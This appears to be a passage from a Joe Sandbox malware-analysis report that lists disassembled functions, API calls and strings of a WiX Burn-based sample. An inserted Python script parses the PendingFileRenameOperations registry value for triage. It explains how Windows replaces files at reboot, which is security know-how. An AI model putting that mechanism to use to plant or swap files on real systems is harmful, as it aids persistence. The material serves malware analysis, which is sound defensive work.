                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                          • String ID: Failed to load ntdll.dll$Failed to load ntdll.dll.$Failed to locate RtlGetVersion.$RtlGetVersion$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\osutil.cpp$ntdll.dll
                                                                                                                                                          • API String ID: 1529210728-1053951979
                                                                                                                                                          • Opcode ID: 58dabcb078f983d08614938ec60f31bfde0609a14d5ba8b8435b21a47ce40de2
                                                                                                                                                          • Instruction ID: 0bb41bfb2cf13b5958723500f2c92caad794eb63a04d8cf28748759e2848c67c
                                                                                                                                                          • Opcode Fuzzy Hash: 58dabcb078f983d08614938ec60f31bfde0609a14d5ba8b8435b21a47ce40de2
                                                                                                                                                          • Instruction Fuzzy Hash: 22216A31B40315BBE7205A54DD86F5B35989B21714F27413BBA04BA2D1F7FC4D0042BD
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 0040A2CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3535843008-3242702962
                                                                                                                                                          • Opcode ID: c38ce44fa2334fcfd990c4393f9ad2f8d5e9575e95a5350a901e1ce0f8fd7d4b
                                                                                                                                                          • Instruction ID: 0a1ca8c50c0a9579732a568984e86a7cd9f43252987fe1648a8efd670ed8ddb5
                                                                                                                                                          • Opcode Fuzzy Hash: c38ce44fa2334fcfd990c4393f9ad2f8d5e9575e95a5350a901e1ce0f8fd7d4b
                                                                                                                                                          • Instruction Fuzzy Hash: 8A11E731E81320B2EA2166058C0BFDB7924CB10F65F6080BFF908792D1A2BD4A10969E
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,00000000,004018AF,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401466
                                                                                                                                                          • GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401472
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004014BD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004014CE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$ErrorHandleLastModule
                                                                                                                                                          • String ID: Failed to get module handle for kernel32.$SetDefaultDllDirectories$SetDllDirectoryW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp$kernel32
                                                                                                                                                          • API String ID: 3392887714-1902336972
                                                                                                                                                          • Opcode ID: 3dce62985b2d8c5eb454e6854f31f511aa0f37df0e4ded713f63b051b5cb358c
                                                                                                                                                          • Instruction ID: c249fd90f0bb3b32ac5b5a075cb26a6e00017ce0c59ff60f1f412a7486bf594e
                                                                                                                                                          • Opcode Fuzzy Hash: 3dce62985b2d8c5eb454e6854f31f511aa0f37df0e4ded713f63b051b5cb358c
                                                                                                                                                          • Instruction Fuzzy Hash: 1801F2B694623067D32117296C0DF9B3E585B50B61F8282B7FA08B62F1D27C084086DC
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to read API version of BAEngineGetRelatedBundleVariable results., xrefs: 00436AB9, 00436AE2
                                                                                                                                                          • Failed to read variable name of BAEngineGetRelatedBundleVariable args., xrefs: 00436A84
                                                                                                                                                          • Failed to write length of value of BAEngineGetRelatedBundleVariable struct., xrefs: 00436B7C
                                                                                                                                                          • Failed to read API version of BAEngineGetRelatedBundleVariable args., xrefs: 00436A32
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\baengine.cpp, xrefs: 00436B23, 00436BB3
                                                                                                                                                          • Failed to read bundle id of BAEngineGetRelatedBundleVariable args., xrefs: 00436A5B
                                                                                                                                                          • Failed to write size of BAEngineGetRelatedBundleVariable struct., xrefs: 00436B57
                                                                                                                                                          • Failed to write value of BAEngineGetRelatedBundleVariable struct., xrefs: 00436BA1
                                                                                                                                                          • Failed to get related bundle variable: %ls, xrefs: 00436B11
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to get related bundle variable: %ls$Failed to read API version of BAEngineGetRelatedBundleVariable args.$Failed to read API version of BAEngineGetRelatedBundleVariable results.$Failed to read bundle id of BAEngineGetRelatedBundleVariable args.$Failed to read variable name of BAEngineGetRelatedBundleVariable args.$Failed to write length of value of BAEngineGetRelatedBundleVariable struct.$Failed to write size of BAEngineGetRelatedBundleVariable struct.$Failed to write value of BAEngineGetRelatedBundleVariable struct.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 0-4142968747
                                                                                                                                                          • Opcode ID: 1b67c2ca3fb896949193fc2ec2eb5e678a9b033662f26bac30a797fe815c8570
                                                                                                                                                          • Instruction ID: 43c3291014696fc7e87bb0b7de2b88be54bedb2ef67a3f302f359e0045425fa9
                                                                                                                                                          • Opcode Fuzzy Hash: 1b67c2ca3fb896949193fc2ec2eb5e678a9b033662f26bac30a797fe815c8570
                                                                                                                                                          • Instruction Fuzzy Hash: 02519831E40726BBDF129A94CC06FDFBEB49B08710F114167F914FA1D0E2B9AE109A99
                                                                                                                                                          APIs
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,?,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004039C8
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00439757,?,?,00000000,0000FDE9,?,?,?,?,00439105,?,?), ref: 004039D4
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 00403AD0
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00439757,?,?,00000000,0000FDE9,?,?,?,?,00439105,?,?), ref: 00403ADA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                          • String ID: Not enough memory to allocate string of size: %u$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\strutil.cpp$failed to allocate string, len: %u$failed to convert to unicode: %s$failed to get required size for conversion to unicode: %s$failed to get size of destination string
                                                                                                                                                          • API String ID: 203985260-3732632410
                                                                                                                                                          • Opcode ID: 1b1425c6b059dc0c19e6607b41a5d914db3a5f20bc947f3e12578369cd4cf98e
                                                                                                                                                          • Instruction ID: 6ab57f18384f71150fd1895267d6bae1e55fb2907d6f6ebca5e531b7a0e6c05b
                                                                                                                                                          • Opcode Fuzzy Hash: 1b1425c6b059dc0c19e6607b41a5d914db3a5f20bc947f3e12578369cd4cf98e
                                                                                                                                                          • Instruction Fuzzy Hash: 1A514971B80224BBD7219E548C4AF6B3A5CAF00765F11417AFA45BB2D1E6B89E009B9C
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to read API version of BAEngineEscapeString results., xrefs: 0043654C
                                                                                                                                                          • Failed to read API version of BAEngineEscapeString args., xrefs: 004364F4
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\baengine.cpp, xrefs: 00436630
                                                                                                                                                          • Failed to write length of formatted string of BAEngineEscapeString struct., xrefs: 004365F9
                                                                                                                                                          • Failed to read allowed length of escaped string of BAEngineEscapeString results., xrefs: 00436575
                                                                                                                                                          • Failed to format string, xrefs: 0043659E
                                                                                                                                                          • Failed to write size of BAEngineEscapeString struct., xrefs: 004365D4
                                                                                                                                                          • Failed to write formatted string of BAEngineEscapeString struct., xrefs: 0043661E
                                                                                                                                                          • Failed to read string to escape of BAEngineEscapeString args., xrefs: 0043651D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to format string$Failed to read API version of BAEngineEscapeString args.$Failed to read API version of BAEngineEscapeString results.$Failed to read allowed length of escaped string of BAEngineEscapeString results.$Failed to read string to escape of BAEngineEscapeString args.$Failed to write formatted string of BAEngineEscapeString struct.$Failed to write length of formatted string of BAEngineEscapeString struct.$Failed to write size of BAEngineEscapeString struct.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 0-3275373110
                                                                                                                                                          • Opcode ID: 854c732bf0c90a2e007c9958dd7bedd837ef0c753801ac8ca4391e5cc88ed7a4
                                                                                                                                                          • Instruction ID: 817f2c2bd4c90427b9536e38395d7ff21cb851b26c5f76e4e8024a84c095dbab
                                                                                                                                                          • Opcode Fuzzy Hash: 854c732bf0c90a2e007c9958dd7bedd837ef0c753801ac8ca4391e5cc88ed7a4
                                                                                                                                                          • Instruction Fuzzy Hash: 8C41D731E81726B7EF129A54CC07FDF7E649B14B50F214167FA04BA1D0E2B89E408B9D
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004141E4
                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004141F5
                                                                                                                                                            • Part of subcall function 0042248F: CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224F7
                                                                                                                                                            • Part of subcall function 0042248F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224FD
                                                                                                                                                          Strings
                                                                                                                                                          • burn.ba.apiver, xrefs: 0041411C
                                                                                                                                                          • Failed to allocate full command-line for bootstrapper application process., xrefs: 0041417E
                                                                                                                                                          • -%ls %llu -%ls %ls %ls, xrefs: 00414121
                                                                                                                                                          • "%ls" %ls, xrefs: 0041416A
                                                                                                                                                          • Failed to allocate parameters for bootstrapper application process., xrefs: 00414140
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp, xrefs: 00414152, 004141C2
                                                                                                                                                          • burn.ba.pipe, xrefs: 0041410C
                                                                                                                                                          • Failed to launch bootstrapper application process: %ls, xrefs: 004141B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                          • String ID: "%ls" %ls$-%ls %llu -%ls %ls %ls$Failed to allocate full command-line for bootstrapper application process.$Failed to allocate parameters for bootstrapper application process.$Failed to launch bootstrapper application process: %ls$burn.ba.apiver$burn.ba.pipe$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
                                                                                                                                                          • API String ID: 161867955-3783781504
                                                                                                                                                          • Opcode ID: d756e6b431d6569be8cdbf5cf63dd028b978ef18e84709fc4eec63a9f8de05c7
                                                                                                                                                          • Instruction ID: eb299b18c28f3289645a04e721287f6f763841a107e2aa9f4210c753d361d0eb
                                                                                                                                                          • Opcode Fuzzy Hash: d756e6b431d6569be8cdbf5cf63dd028b978ef18e84709fc4eec63a9f8de05c7
                                                                                                                                                          • Instruction Fuzzy Hash: 4E31CF71E80219BBEF119F90CC46EEFBF75EF18754F504066FA04792A0D2B84E909A99
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000000,00477850,000000FF,feclient.dll,000000FF,00000000,00000000,?,00000000,00000000), ref: 0044313B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to insert execute action., xrefs: 004431A0
                                                                                                                                                          • Failed to grow array of ordered patches., xrefs: 00443307
                                                                                                                                                          • feclient.dll, xrefs: 00443131, 00443253
                                                                                                                                                          • Failed to copy target product code., xrefs: 00443266
                                                                                                                                                          • Failed to get msp ui options., xrefs: 004432AE
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\mspengine.cpp, xrefs: 004431FA
                                                                                                                                                          • Failed to plan action for target product., xrefs: 004431E8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to copy target product code.$Failed to get msp ui options.$Failed to grow array of ordered patches.$Failed to insert execute action.$Failed to plan action for target product.$d:\a\wix\wix\src\burn\engine\mspengine.cpp$feclient.dll
                                                                                                                                                          • API String ID: 1825529933-2136478367
                                                                                                                                                          • Opcode ID: 1728a37997e106c652ae82592478484f1523975b2eacbde67368181158570dc8
                                                                                                                                                          • Instruction ID: bd5af6159679b93b4707498a97378bed5d81601d916fa338369ce0a4db0281c3
                                                                                                                                                          • Opcode Fuzzy Hash: 1728a37997e106c652ae82592478484f1523975b2eacbde67368181158570dc8
                                                                                                                                                          • Instruction Fuzzy Hash: 6EA1A075A00209EFEB14CF94C981F9A7BB4FF08715F1141AAE905AB391C774EE41CB54
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,000000B0), ref: 00470660
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\file2utl.cpp, xrefs: 0047063A
                                                                                                                                                          • Failed to compare path from pending file rename to check path., xrefs: 0047066F
                                                                                                                                                          • Failed to update pending file renames., xrefs: 0047062B
                                                                                                                                                          • Failed to open pending file rename registry key., xrefs: 00470515
                                                                                                                                                          • Failed to read pending file renames., xrefs: 00470562
                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004704D3
                                                                                                                                                          • PendingFileRenameOperations, xrefs: 00470536, 00470618
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to compare path from pending file rename to check path.$Failed to open pending file rename registry key.$Failed to read pending file renames.$Failed to update pending file renames.$PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\file2utl.cpp
                                                                                                                                                          • API String ID: 3535843008-29367118
                                                                                                                                                          • Opcode ID: eeec8495158b9aa6dc5c94e27d51d319d2ec86f2ddf90e798a10c59388f3b778
                                                                                                                                                          • Instruction ID: d4225f3126f7d35013523cc3c9790edbcc6d98189b7feaa42f45d7e0af99bbf8
                                                                                                                                                          • Opcode Fuzzy Hash: eeec8495158b9aa6dc5c94e27d51d319d2ec86f2ddf90e798a10c59388f3b778
                                                                                                                                                          • Instruction Fuzzy Hash: 1D51CD71E41219FBCB30DE59CC41FEFBBB8AF40700F11815BA908BB291D679DE109A99
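The strings in the function above (file2utl.cpp under d:\a\wix\wix\src\libs\dutil) are build paths of the WiX Toolset's dutil library, so this routine is the installer engine's own housekeeping code rather than anything specific to this sample: it opens SYSTEM\CurrentControlSet\Control\Session Manager, reads the REG_MULTI_SZ value PendingFileRenameOperations, compares each entry against a path, and rewrites the value. That value is still worth reading during triage, because smss.exe applies every rename or delete listed in it at the next boot, and a report that also flags executables dropped into C:\Windows makes reboot-time writes there the first thing to look for. The following Python is an added example, not code from the report or from WiX: it decodes a constructed copy of that value (raw bytes, as carved from a hive or exported from a live system), pairs sources with destinations, performs the same case-insensitive match-and-remove the dutil function does, and applies a watched-root heuristic that is an assumption of this example.

```python
from __future__ import annotations

from dataclasses import dataclass

# Windows stores pending renames as NT-style paths; dutil strips this prefix
# before comparing them with Win32 paths.
NT_PREFIX = "\\??\\"


@dataclass(frozen=True)
class PendingOp:
    source: str
    destination: str  # "" means "delete source at next boot"

    @property
    def is_delete(self) -> bool:
        return self.destination == ""


def decode_multi_sz(raw: bytes) -> list[str]:
    """Decode a REG_MULTI_SZ blob: UTF-16LE strings, each NUL-terminated,
    with one extra NUL closing the list. Empty strings inside the list are
    kept because an empty destination is how a delete-on-reboot is encoded."""
    text = raw.decode("utf-16-le")
    if not text.endswith("\0\0"):
        raise ValueError("not a terminated REG_MULTI_SZ value")
    if text == "\0\0":             # an empty value is just the list terminator
        return []
    items = text[:-1].split("\0")  # drop the list terminator, split on string NULs
    return items[:-1]              # the last string's own NUL leaves an empty tail


def encode_multi_sz(items: list[str]) -> bytes:
    """Inverse of decode_multi_sz, used when rewriting the value."""
    return ("\0".join(items) + "\0\0").encode("utf-16-le")


def strip_nt_prefix(path: str) -> str:
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_renames(raw: bytes) -> list[PendingOp]:
    """Pair up the entries: even index = source, odd index = destination."""
    items = decode_multi_sz(raw)
    if len(items) % 2:
        raise ValueError("PendingFileRenameOperations must be source/destination pairs")
    return [PendingOp(strip_nt_prefix(items[i]), strip_nt_prefix(items[i + 1]))
            for i in range(0, len(items), 2)]


def find_pending(ops: list[PendingOp], path: str) -> list[PendingOp]:
    """Case-insensitive match of a Win32 path against either side of each
    entry, the comparison dutil makes before deciding whether to rewrite."""
    key = path.casefold()
    return [op for op in ops if key in (op.source.casefold(), op.destination.casefold())]


def remove_pending(raw: bytes, path: str) -> bytes:
    """Return the value with every entry touching `path` removed: the
    'update pending file renames' step, done on the blob, not the registry."""
    ops = parse_pending_renames(raw)
    drop = set(find_pending(ops, path))
    keep: list[str] = []
    for op in ops:
        if op in drop:
            continue
        keep.append(NT_PREFIX + op.source)
        keep.append(NT_PREFIX + op.destination if op.destination else "")
    return encode_multi_sz(keep)


def flag_reboot_writes(ops: list[PendingOp],
                       watched_roots: tuple[str, ...] = ("C:\\Windows\\",)) -> list[PendingOp]:
    """Triage heuristic (an assumption of this example, not from the report):
    entries that will create, replace or delete a file under a watched root
    at next boot, which is when smss.exe applies this list."""
    roots = tuple(r.casefold() for r in watched_roots)
    return [op for op in ops
            if (op.source if op.is_delete else op.destination).casefold().startswith(roots)]


# Constructed sample value, not taken from the analysed binary: one rename that
# lands in C:\Windows at reboot and one delete-on-reboot of a temp file.
SAMPLE_VALUE = encode_multi_sz([
    NT_PREFIX + "C:\\Users\\user\\AppData\\Local\\Temp\\stage.tmp",
    NT_PREFIX + "C:\\Windows\\dropped.exe",
    NT_PREFIX + "C:\\Users\\user\\AppData\\Local\\Temp\\old.dll",
    "",
])

if __name__ == "__main__":
    for op in parse_pending_renames(SAMPLE_VALUE):
        kind = "DELETE" if op.is_delete else "RENAME"
        print(f"{kind:6} {op.source} -> {op.destination or '(removed)'}")
    print("reboot-time writes under watched roots:",
          flag_reboot_writes(parse_pending_renames(SAMPLE_VALUE)))
```

On a live Windows host the same value can be obtained from the Session Manager key with any registry API that returns the raw REG_MULTI_SZ bytes; the decoder deliberately keeps empty strings, since dropping them silently turns a delete-on-reboot into a rename of the next entry.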
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004016CA: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,00439EE2,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 004016DE
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002,?,00000000,000000FF,00000000), ref: 0040813F
                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 00408155
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040815F
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00408169
                                                                                                                                                            • Part of subcall function 004662D8: EnterCriticalSection.KERNEL32(004B2588,00000000,?,004097D3,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004662E2
                                                                                                                                                            • Part of subcall function 004662D8: LeaveCriticalSection.KERNEL32(004B2588,?,004097D3,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004662F9
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to reset log event., xrefs: 004081F0
                                                                                                                                                          • Failed to wait for log thread events, signaled: %u., xrefs: 0040821D
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\engine.cpp, xrefs: 004081E6, 00408202, 0040822F
                                                                                                                                                          • Failed to wait log message over pipe., xrefs: 004081A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
